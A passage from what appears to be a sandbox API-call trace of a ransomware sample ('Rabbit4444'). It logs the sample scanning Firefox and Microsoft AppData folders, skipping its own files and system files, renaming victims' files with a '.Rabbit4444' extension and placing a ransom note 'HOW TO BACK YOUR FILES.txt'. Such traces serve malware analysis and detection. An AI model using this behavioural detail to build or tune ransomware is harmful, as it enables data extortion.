(lpString1="events", lpString2="NTUSER.DAT") returned -1 [0052.277] lstrcpyW (in: lpString1=0x130ebb4, lpString2="events" | out: lpString1="events") returned="events" [0052.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0052.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8a) returned 0x11eb00 [0052.277] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf6370 [0052.277] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfafe15e1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InstallTime20170824053622", cAlternateFileName="INSTAL~1")) returned 1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="Rabbit4444.exe") returned -1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2=".") returned 1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="..") returned 1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="windows") returned -1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="bootmgr") returned 1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="pagefile.sys") returned -1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="boot") returned 1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="ids.txt") returned 1 [0052.277] lstrcmpiW (lpString1="InstallTime20170824053622", lpString2="NTUSER.DAT") returned -1 [0052.278] lstrcpyW (in: lpString1=0x130ebb4, lpString2="InstallTime20170824053622" | out: lpString1="InstallTime20170824053622") returned="InstallTime20170824053622" [0052.278] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170824053622", dwFileAttributes=0x0) returned 1 [0052.278] lstrlenW (lpString="InstallTime20170824053622") returned 25 [0052.278] lstrlenW (lpString="Rabbit4444") returned 10 [0052.278] lstrcmpiW (lpString1="0824053622", lpString2="Rabbit4444") returned -1 [0052.278] lstrlenW (lpString=".dll") returned 4 [0052.278] lstrcmpiW (lpString1="3622", lpString2=".dll") returned 1 [0052.278] lstrlenW (lpString=".lnk") returned 4 [0052.278] lstrcmpiW (lpString1="3622", lpString2=".lnk") returned 1 [0052.278] lstrlenW (lpString=".ini") returned 4 [0052.278] lstrcmpiW (lpString1="3622", lpString2=".ini") returned 1 [0052.278] lstrlenW (lpString=".sys") returned 4 [0052.278] lstrcmpiW (lpString1="3622", lpString2=".sys") returned 1 [0052.278] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170824053622" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170824053622"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.278] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.278] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14358915276) returned 1 [0052.278] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=10) returned 1 [0052.279] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0052.279] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0052.279] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x298 [0052.280] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0052.281] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.281] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0052.281] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.281] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0052.281] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.281] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0052.281] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.281] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0052.281] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14359213563) returned 1 [0052.281] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0052.281] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0052.281] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.282] CloseHandle (hObject=0x298) returned 1 [0052.282] CloseHandle (hObject=0x278) returned 1 [0052.282] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170824053622.Rabbit4444") returned 98 [0052.282] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170824053622" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170824053622"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170824053622.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170824053622.rabbit4444"), dwFlags=0x1) returned 1 [0052.282] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfafe15e1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InstallTime20170824053622", cAlternateFileName="INSTAL~1")) returned 0 [0052.282] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0052.282] lstrcpyW (in: lpString1=0x130ebb4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.282] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.283] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.283] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.283] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.283] CloseHandle (hObject=0x278) returned 1 [0052.283] CloseHandle (hObject=0x27c) returned 1 [0052.283] GetCurrentThreadId () returned 0xd98 [0052.283] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0052.283] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events" [0052.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11eb00 | out: hHeap=0xe0000) returned 1 [0052.283] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0052.283] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events" [0052.283] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\" [0052.283] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\.BFC0E91B00AE8A0620D3" [0052.283] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\events\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.285] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.287] FlushFileBuffers (hFile=0x27c) returned 1 [0052.288] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.288] CloseHandle (hObject=0x27c) returned 1 [0052.289] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events") returned 68 [0052.289] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.289] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe87d4ab5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0052.289] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.289] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.289] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.289] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.289] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe87d4ab5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.289] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.289] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.289] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.289] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.289] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.289] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe87d4ab5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe87d4ab5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87d4ab5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.289] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.289] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.289] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe87d4ab5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe87d4ab5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87d4ab5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.289] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0052.292] lstrcpyW (in: lpString1=0x130ebc2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.292] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\events\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.292] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.292] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.292] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.293] CloseHandle (hObject=0x278) returned 1 [0052.293] CloseHandle (hObject=0x27c) returned 1 [0052.293] GetCurrentThreadId () returned 0xd98 [0052.293] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0052.293] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions" [0052.293] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1448 | out: hHeap=0xe0000) returned 1 [0052.293] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0052.293] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions" [0052.293] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\" [0052.293] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\.BFC0E91B00AE8A0620D3" [0052.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\extensions\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.294] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.297] FlushFileBuffers (hFile=0x27c) returned 1 [0052.298] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.298] CloseHandle (hObject=0x27c) returned 1 [0052.299] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions") returned 50 [0052.299] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.299] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8b64ce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe87d4ab5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0052.299] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.299] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.299] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.299] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.299] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8b64ce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe87d4ab5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.299] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.299] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.299] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.299] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.299] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.299] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe87d4ab5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe87d4ab5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87fad35, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.299] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.299] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.299] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe87d4ab5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe87d4ab5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87fad35, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.299] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0052.299] lstrcpyW (in: lpString1=0x130eb9e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.299] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Extensions\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\extensions\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.300] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.300] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.300] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.300] CloseHandle (hObject=0x278) returned 1 [0052.300] CloseHandle (hObject=0x27c) returned 1 [0052.300] GetCurrentThreadId () returned 0xd98 [0052.300] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0052.300] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft" [0052.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1158c8 | out: hHeap=0xe0000) returned 1 [0052.301] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0052.301] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft" [0052.301] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\" [0052.301] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3" [0052.301] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.301] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.304] FlushFileBuffers (hFile=0x27c) returned 1 [0052.305] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.305] CloseHandle (hObject=0x27c) returned 1 [0052.308] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft") returned 41 [0052.308] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.308] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xe87fad35, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0052.308] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.308] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.308] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.308] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.308] FindNextFileW (in: hFindFile=0x102850, 